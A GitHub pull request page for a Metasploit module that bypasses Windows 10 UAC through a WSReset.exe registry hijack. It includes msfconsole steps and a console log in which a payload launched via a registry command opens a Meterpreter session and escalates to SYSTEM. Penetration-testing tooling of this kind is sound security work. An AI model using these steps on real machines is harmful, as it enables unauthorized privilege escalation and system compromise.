Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

WSReset.exe UAC bypass Take 2 #12280

Merged
merged 8 commits into from Sep 5, 2019

Conversation

@bwatters-r7
Copy link
Contributor

commented Sep 5, 2019

This is a bit of a long story. I was testing and preparing to land another PR: #12226

When it did not work, I looked up "WSReset.exe bypass method" on Google and I realized that the PR was missing crucial steps, so I tried to add them. In the end, I rewrote most of the module, and it worked. Then I realized that there were two ways to bypass UAC using the WSReset.exe file, and I had simply found the wrong one. The original PR used the other way. These methods are fairly different, and share little code, so we decided to split them into two modules.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Get a session on a Windows 10 1803 or 1809 machine (I only tested x64)
  • use exploit/windows/local/bypassuac_windows_store_reg
  • set session X
  • run
  • verify you get a session
  • run getsystem
  • verify you are system

Running this on non-vulnerable machines appears to result in a shell that cannot be upgraded. Windows Defender has signatures for this attack, but this was not deemed as a vulnerability by MSRT, so 馃し鈥嶁檪

timwr and others added 8 commits Aug 24, 2019

@bwatters-r7 bwatters-r7 changed the title Update 12226 WSReset.exe UAC bypass Take 2 Sep 5, 2019

@timwr timwr self-assigned this Sep 5, 2019

timwr added a commit that referenced this pull request Sep 5, 2019

@timwr timwr merged commit 20216ac into rapid7:master Sep 5, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@timwr

This comment has been minimized.

Copy link
Contributor

commented Sep 5, 2019

Works great! Much better now there is no extra windows folder left behind.

msf5 exploit(windows/local/bypassuac_windows_store_reg) > run

[*] Started reverse TCP handler
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\WINDOWS
[*] tmp_dir = C:\Users\User\AppData\Local\Temp
[*] exploit_dir = C:\WINDOWS\System32\
[*] exploit_file = C:\WINDOWS\System32\WSReset.exe
[*] payload_pathname = C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe
[*] Making Payload
[*] reg_command = C:\WINDOWS\System32\cmd.exe /c start C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe
[*] Making Registry Changes
[*] Registry Changes Complete
[*] Uploading Payload to C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe
[*] Payload Upload Complete
[*] Launching C:\WINDOWS\System32\WSReset.exe
[!] This exploit requires manual cleanup of 'C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe!
[*] Sending stage (206403 bytes)
[*] Meterpreter session 2 opened
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter >
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > exit
msjenkins-r7 added a commit that referenced this pull request Sep 5, 2019
@bwatters-r7

This comment has been minimized.

Copy link
Contributor Author

commented Sep 5, 2019

Release Notes

This modules uses a registry hijack that exists in WSReset.exe on some Windows 10 releases that allows execution of an arbitrary exe file with elevated privileges.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can鈥檛 perform that action at this time.